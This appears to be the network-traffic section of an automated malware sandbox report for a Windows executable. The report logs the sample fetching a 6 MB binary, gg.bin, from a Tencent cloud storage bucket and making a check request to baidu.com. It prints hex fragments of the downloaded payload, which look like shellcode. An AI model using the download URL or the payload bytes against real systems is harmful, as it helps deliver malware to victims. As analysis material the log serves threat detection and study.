                                                                        Mar 12, 2025 10:22:34.713166952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713181019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713265896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.713274002 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713291883 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713310003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.713310003 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713321924 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.713346958 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.713387012 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.714332104 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.714346886 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.714396000 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.714404106 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.714422941 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.714452028 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767069101 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767095089 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767292023 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767302990 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767343044 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767400026 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767415047 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767446041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767451048 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767476082 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767493010 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767703056 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767716885 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767784119 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.767790079 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.767838955 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.768079996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.768104076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.768134117 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.768137932 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.768162966 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.768172026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.797554970 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.797600031 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.797620058 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.797627926 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.797668934 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.801676035 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801693916 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801750898 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.801757097 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801795959 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.801853895 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801871061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801906109 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.801912069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.801939964 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.801956892 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.802999973 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.803014994 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.803081989 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.803095102 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.803138018 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.855840921 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.855858088 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.855942965 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.855968952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.855992079 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.856019020 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857251883 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857268095 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857326984 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857332945 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857367992 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857388973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857580900 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857595921 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857640982 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857649088 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857681990 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857700109 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857764959 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857778072 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857815981 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857820988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.857852936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.857876062 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.886995077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.887043953 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.887106895 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.887114048 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.887268066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.890836954 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.890855074 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.890916109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.890923977 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.890938044 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.890952110 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.890990973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.892077923 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.892117977 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.892152071 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:34.892155886 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.892189026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.892209053 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.984610081 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:34.984641075 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:35.103207111 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:35.107948065 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:35.108006001 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:35.108995914 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:35.113630056 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039053917 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039141893 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039153099 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039172888 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039185047 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039196014 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039206982 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039216995 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039228916 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039237976 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.039299011 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.039299011 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.039299011 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.039299011 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.039474964 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.044027090 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.044058084 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.044068098 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.044102907 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.044105053 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.044122934 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.044157982 CET4969080192.168.2.6103.235.46.115
                                                                        Mar 12, 2025 10:22:36.044379950 CET8049690103.235.46.115192.168.2.6
                                                                        Mar 12, 2025 10:22:36.044459105 CET4969080192.168.2.6103.235.46.115
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 12, 2025 10:22:26.067416906 CET5343753192.168.2.61.1.1.1
                                                                        Mar 12, 2025 10:22:26.501768112 CET53534371.1.1.1192.168.2.6
                                                                        Mar 12, 2025 10:22:35.092396975 CET6223653192.168.2.61.1.1.1
                                                                        Mar 12, 2025 10:22:35.099075079 CET53622361.1.1.1192.168.2.6
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Mar 12, 2025 10:22:26.067416906 CET192.168.2.61.1.1.10x44ffStandard query (0)oiuecvb-1341436096.cos.ap-hongkong.myqcloud.comA (IP address)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:35.092396975 CET192.168.2.61.1.1.10x61a4Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Mar 12, 2025 10:22:26.501768112 CET1.1.1.1192.168.2.60x44ffNo error (0)oiuecvb-1341436096.cos.ap-hongkong.myqcloud.comhk.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:26.501768112 CET1.1.1.1192.168.2.60x44ffNo error (0)hk.file.myqcloud.com43.132.105.214A (IP address)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:35.099075079 CET1.1.1.1192.168.2.60x61a4No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:35.099075079 CET1.1.1.1192.168.2.60x61a4No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:35.099075079 CET1.1.1.1192.168.2.60x61a4No error (0)www.wshifen.com103.235.46.115A (IP address)IN (0x0001)false
                                                                        Mar 12, 2025 10:22:35.099075079 CET1.1.1.1192.168.2.60x61a4No error (0)www.wshifen.com103.235.46.102A (IP address)IN (0x0001)false
                                                                        • oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com
                                                                        • www.baidu.com
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649690103.235.46.115807272C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 12, 2025 10:22:35.108995914 CET135OUTGET / HTTP/1.1
                                                                        Host: www.baidu.com
                                                                        Accept: */*
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Mar 12, 2025 10:22:36.039053917 CET1236INHTTP/1.1 200 OK
                                                                        Bdpagetype: 1
                                                                        Bdqid: 0xd6dad86001150b51
                                                                        Connection: keep-alive
                                                                        Content-Length: 510435
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Date: Wed, 12 Mar 2025 09:22:35 GMT
                                                                        P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                        P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                        Server: BWS/1.1
                                                                        Set-Cookie: BAIDUID=1A275B23999320F3B6B3815302A1744F:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                        Set-Cookie: BIDUPSID=1A275B23999320F3B6B3815302A1744F; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                        Set-Cookie: PSTM=1741771355; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                        Set-Cookie: BAIDUID=1A275B23999320F3278E752C63CF87DA:FG=1; max-age=31536000; expires=Thu, 12-Mar-26 09:22:35 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                        Set-Cookie: BDSVRTM=44; path=/
                                                                        Set-Cookie: BD_HOME=1; path=/
                                                                        Traceid: 1741771355089831629815481924575886117713
                                                                        Vary: Accept-Encoding
                                                                        X-Ua-Compatible: IE=Edge,chrome=1
                                                                        X-Xss-Protection: 1;mode=block
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 53 54 41 54 55 53 20 4f 4b 2d 2d 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 61 6c
                                                                        Data Ascii: <!DOCTYPE html>...STATUS OK--><html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta content="al
                                                                        Mar 12, 2025 10:22:36.039141893 CET224INData Raw: 77 61 79 73 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 66 66 66 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72
                                                                        Data Ascii: ways" name="referrer"><meta name="theme-color" content="#ffffff"><meta name="description" content="
                                                                        Mar 12, 2025 10:22:36.039153099 CET1236INData Raw: 91 e9 a1 b5 e6 95 b0 e6 8d ae e5 ba 93 ef bc 8c e5 8f af e4 bb a5 e7 9e ac e9 97 b4 e6 89 be e5 88 b0 e7 9b b8 e5 85 b3 e7 9a 84 e6 90 9c e7 b4 a2 e7 bb 93 e6 9e 9c e3 80 82 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63
                                                                        Data Ascii: "><link rel="shortcut icon" href="https://www.baidu.com/favicon.ico" type="image/x-icon" /><link rel="search" type="application/opensearchdescription+xml" href="/content-search.xml" tit
                                                                        Mar 12, 2025 10:22:36.039172888 CET1236INData Raw: 65 64 65 64 65 64 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 33 70 78 20 23 65 64 65 64 65 64 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 33 70 78 20 23 65 64 65 64 65 64 7d 2e 62 64 73 75
                                                                        Data Ascii: ededed;-moz-box-shadow:1px 1px 3px #ededed;-o-box-shadow:1px 1px 3px #ededed}.bdsug li{width:519px;color:#000;font:14px arial;line-height:25px;padding:0 8px;position:relative;cursor:default}.bdsug li.bdsug-s{background:#f0f0f0}.bdsug-store spa
                                                                        Mar 12, 2025 10:22:36.039185047 CET1236INData Raw: 34 30 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 62 39 39 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 31
                                                                        Data Ascii: 400;color:#fff;background-color:#2b99ff;display:inline;text-align:center;padding:1px 5px;*padding:2px 5px 0;margin-left:8px;overflow:hidden}.bdsug .bdsug-pcDirect{color:#000;font-size:14px;line-height:30px;height:30px;background-color:#f8f8f8}
                                                                        Mar 12, 2025 10:22:36.039196014 CET672INData Raw: 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 74 6f 67 67 6c 65 2d 75 6e 64 65 72 6c 69 6e 65 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 74 6f 67 67 6c 65 2d 75 6e 64 65 72 6c 69 6e 65 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64
                                                                        Data Ascii: display:none}.toggle-underline{text-decoration:none}.toggle-underline:hover{text-decoration:underline}.bdpfmenu,.usermenu{border:1px solid #d1d1d1;position:absolute;width:105px;top:36px;z-index:302;box-shadow:1px 1px 5px #d1d1d1;-webkit-box-sh
                                                                        Mar 12, 2025 10:22:36.039206982 CET1236INData Raw: 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 3a 2f 2f 70 73 73 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 72 2f 77 77 77 2f 63 61 63 68 65 2f 73 74 61 74 69 63 2f 68 6f 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 5f 38 30 39 61 65 36
                                                                        Data Ascii: kground-image:url(http://pss.bdstatic.com/r/www/cache/static/home/img/icons_809ae65.gif)\9}.bdpfmenu a:link,.bdpfmenu a:visited,#u .usermenu a:link,#u .usermenu a:visited{background:#fff;color:#333}.bdpfmenu a:hover,.bdpfmenu a:active,#u .user
                                                                        Mar 12, 2025 10:22:36.039216995 CET1236INData Raw: 77 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 63 6f 6c 6f 72 3a 23 61 61 61 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 34 30 70 78
                                                                        Data Ascii: w-placeholder{position:absolute;top:0;left:0;color:#aaa;font-size:13px;height:40px;line-height:40px;padding-left:10px;max-width:360px;z-index:99;pointer-events:none}.kw-placeholder.kw-placehlder-high{height:40px;line-height:40px}.kw-placeholde
                                                                        Mar 12, 2025 10:22:36.039228916 CET1236INData Raw: 65 77 20 75 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74
                                                                        Data Ascii: ew ul li{line-height:34px;font-size:16px;margin-left:0;margin-right:0;padding-left:5px;padding-right:0;width:100%;border-radius:9px;box-sizing:border-box;color:#9195A3}#main-wrapper .bdsug-new ul li .bdsug-store-del{font-size:14px;color:#62667
                                                                        Mar 12, 2025 10:22:36.039237976 CET104INData Raw: 6e 65 20 61 7b 63 6f 6c 6f 72 3a 23 36 32 36 36 37 35 21 69 6d 70 6f 72 74 61 6e 74 7d 23 6d 61 69 6e 2d 77 72 61 70 70 65 72 20 2e 62 64 73 75 67 2d 6e 65 77 20 2e 62 64 73 75 67 2d 66 65 65 64 62 61 63 6b 2d 74 6f 6f 6c 2d 7a 6f 6e 65 20 73 70
                                                                        Data Ascii: ne a{color:#626675!important}#main-wrapper .bdsug-new .bdsug-feedback-tool-zone span:hover,#main-wrapper
                                                                        Mar 12, 2025 10:22:36.044027090 CET1236INData Raw: 20 2e 62 64 73 75 67 2d 6e 65 77 20 2e 62 64 73 75 67 2d 66 65 65 64 62 61 63 6b 2d 74 6f 6f 6c 2d 7a 6f 6e 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 33 33 35 42 46 46 21 69 6d 70 6f 72 74 61 6e 74 7d 23 6d 61 69 6e 2d 77 72 61 70 70 65
                                                                        Data Ascii: .bdsug-new .bdsug-feedback-tool-zone a:hover{color:#335BFF!important}#main-wrapper .bdsug-new .bdsug-feedback-tool-zone>:last-child{margin-right:6px!important}#main-wrapper .bdsug-new ul li .direct-sug-wrap .right-btn{margin-top:7px}#main-wra


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.64968643.132.105.2144437272C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-12 09:22:29 UTC104OUTGET /gg.bin HTTP/1.1
                                                                        Host: oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com
                                                                        Cache-Control: no-cache
                                                                        2025-03-12 09:22:30 UTC512INHTTP/1.1 200 OK
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 6087913
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Content-Disposition: attachment
                                                                        Date: Wed, 12 Mar 2025 09:22:30 GMT
                                                                        ETag: "e81ea30518ee2af1ec598c65f3c7b4cf"
                                                                        Last-Modified: Wed, 05 Mar 2025 08:20:14 GMT
                                                                        Server: tencent-cos
                                                                        x-cos-force-download: true
                                                                        x-cos-hash-crc64ecma: 16607555608813225031
                                                                        x-cos-request-id: NjdkMTUyNTZfZmI2M2UwOV8xMGYzYV9lOGEwOTcx
                                                                        x-cos-storage-class: MAZ_STANDARD
                                                                        x-cosindex-replication-status: Complete
                                                                        2025-03-12 09:22:30 UTC7692INData Raw: 48 81 ec c8 02 00 00 48 c7 84 24 68 01 00 00 00 00 00 00 48 c7 84 24 00 01 00 00 00 00 00 00 48 c7 84 24 a0 02 00 00 00 00 00 00 48 c7 84 24 60 01 00 00 00 00 00 00 65 48 8b 04 25 60 00 00 00 48 89 84 24 78 02 00 00 48 8b 84 24 78 02 00 00 48 8b 40 18 48 89 84 24 80 02 00 00 48 8b 84 24 80 02 00 00 48 8b 40 20 48 89 84 24 d0 01 00 00 48 8b 84 24 d0 01 00 00 48 8b 40 50 48 89 84 24 a8 02 00 00 48 8b 84 24 d0 01 00 00 48 8b 00 48 89 84 24 d8 01 00 00 48 8b 84 24 d8 01 00 00 48 8b 40 50 48 89 84 24 b0 02 00 00 48 8b 84 24 d8 01 00 00 48 8b 00 48 89 84 24 e0 01 00 00 48 8b 84 24 e0 01 00 00 48 8b 40 50 48 89 84 24 b8 02 00 00 48 8b 84 24 e0 01 00 00 48 8b 40 20 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 48 89 84 24 88 02 00 00 48 8b 84 24 88 02 00 00 48
                                                                        Data Ascii: HH$hH$H$H$`eH%`H$xH$xH@H$H$H@ H$H$H@PH$H$HH$H$H@PH$H$HH$H$H@PH$H$H@ H$H$H$H$H
                                                                        2025-03-12 09:22:30 UTC16368INData Raw: e9 7d 0e 00 89 11 48 89 41 08 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 20 55 56 57 48 8d 6c 24 b9 48 81 ec b0 00 00 00 48 8b 05 c5 68 0e 00 48 33 c4 48 89 45 37 48 8b f2 48 8b f9 48 89 4d c7 49 8b d0 48 8d 4d ef e8 58 23 00 00 48 8b d8 48 89 45 c7 0f 10 06 0f 29 45 17 48 8b 48 10 48 85 c9 74 51 48 8b 50 18 48 8b c2 48 2b c1 48 83 f8 02 72 24 48 8d 41 02 48 89 43 10 48 8b c3 48 83 fa 10 72 03 48 8b 03 ba 3a 20 00 00 66 89 14 08 c6 44 08 02 00 eb 1d 48 c7 44 24 20 02 00 00 00 4c 8d 0d 45 6f 0d 00 ba 02 00 00 00 48 8b cb e8 80 31 00 00 48 8b 4d 1f 48 8b 01 44 8b 45 17 48 8d 55 17 ff 50 10 90 48 8d 55 17 48 83 7d 2f 10 48 0f 43 55 17 4c 8b 45 27 48 8b cb e8 a3 27 00 00 90 48 8b 55 2f 48 83 fa 10 72 31 48 ff c2 48 8b 4d 17 48 8b c1
                                                                        Data Ascii: }HAHH\$ UVWHl$HHhH3HE7HHHMIHMX#HHE)EHHHtQHPHH+Hr$HAHCHHrH: fDHD$ LEoH1HMHDEHUPHUH}/HCULE'H'HU/Hr1HHMH
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: cf ff 15 76 ee 0a 00 48 8b 5c 24 30 85 c0 75 11 33 d2 48 8b cf 48 83 c4 20 5f 48 ff 25 8c ea 0a 00 48 83 c4 20 5f c3 cc cc cc cc cc cc 48 89 5c 24 18 55 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 d9 48 81 ec c0 00 00 00 48 8b 05 bd 28 0e 00 48 33 c4 48 89 45 1f 45 33 e4 48 8b f1 48 83 79 18 10 72 03 48 8b 31 4c 8b 79 10 48 85 f6 0f 84 58 04 00 00 4d 85 ff 0f 84 4f 04 00 00 0f 57 c0 0f 11 45 bf 4c 89 65 cf 4c 89 65 d7 4c 8b f2 48 83 7a 18 08 72 03 4c 8b 32 48 8b 7a 10 48 b8 fe ff ff ff ff ff ff 7f 48 3b f8 0f 87 4b 04 00 00 b9 0a 00 00 00 48 c7 45 d7 07 00 00 00 48 83 ff 08 73 16 48 89 7d cf 44 8d 41 06 49 8b d6 48 8d 4d bf e8 06 ac 07 00 eb 45 48 8b df 48 83 cb 07 48 3b d8 76 05 48 8b d8 eb 07 48 3b d9 48 0f 42 d9 48 8d 53 01 48 8d 4d bf e8 ef e6 ff ff 48
                                                                        Data Ascii: vH\$0u3HH _H%H _H\$UVWATAUAVAWHl$HH(H3HEE3HHyrH1LyHXMOWELeLeLHzrL2HzHH;KHEHsH}DAIHMEHHH;vHH;HBHSHMH
